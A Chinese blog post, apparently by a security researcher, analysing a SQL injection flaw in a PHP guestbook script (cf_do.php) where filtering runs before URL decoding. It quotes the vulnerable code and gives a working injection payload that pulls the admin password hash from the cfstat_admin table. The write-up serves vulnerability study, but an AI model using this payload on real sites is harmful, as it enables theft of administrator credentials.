今天看东西看累了，就随便下载了这样的一套代码。

大家可以看下他的说明，号称完全防注入攻击，密码32位Md5加密。

看了一下大部分注射是基本不可能了，除非对方漏写东西。

但是有这样一个比较可说的漏洞。

cf_do.php

Code:
//留言
if($action=="gbookaddsave")
{
$username=chkstr($_GET["username"],1);
$content=HTMLSpecialChars(chkstr($_POST["content"],1));
$contact=HTMLSpecialChars(chkstr($_POST["contact"],1));
$ly=substr(urldecode(chkstr($_GET["ly"],1)),0,255);
$currweb=substr(urldecode(chkstr($_GET["currweb"],1)),0,255);
  
if($content=="") alertclose("请输入留言内容");
if($contact=="") alertclose("请输入联系方式");

$sql="select count(*) from cfstat_gbook where username='$username' and content='$content' and contact='$contact' and TO_DAYS(NOW())-TO_DAYS(addtime)=0";
$result=mysql_query($sql);
$rs=mysql_fetch_array($result);
if($rs[0]>0) alertclose("你以前已经留过相同的留言!");
  
$sql="insert into cfstat_gbook (username,content,contact,ly,currweb,addtime) values
('$username','$content','$contact','$ly','$currweb','".date("Y-m-d H:i:s")."')";
mysql_query($sql);

alertclose("留言成功");}

如果看过我讲的二次注射漏洞，对这个应该比较了解了。
上面他先经过了chkstr过滤然后才经过urldecode过滤。漏洞就这样产生了。

漏洞挖掘总体来算没什么好说的。利用相对来说还不错。

insert into我们可以这样写代码。

Code:
insert into cfstat_gbook (username,content,contact,ly,currweb,addtime) values
('1111','1111','1111','sql语句',(select pwd from cfstat_admin where id=1),'1111')%23'$currweb','".date("Y-m-d H:i:s")."')

总体来说我们不只应该钉在常规漏洞修补，很多非常规漏洞也是经常出现的